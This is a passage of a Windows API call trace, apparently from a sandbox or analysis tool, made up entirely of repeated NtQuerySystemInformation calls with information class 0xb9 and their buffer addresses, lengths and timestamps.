(SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x28, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0269.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0269.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0269.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0269.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0269.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0269.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0269.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0269.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x28, ResultLength=0x0) [0269.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0269.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x20, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x20, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x20, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x28, ResultLength=0x0) [0269.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0269.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0269.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0269.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0269.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0269.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0269.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3f0, Length=0x20, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3f0, Length=0x20, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3f0, Length=0x20, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.452] 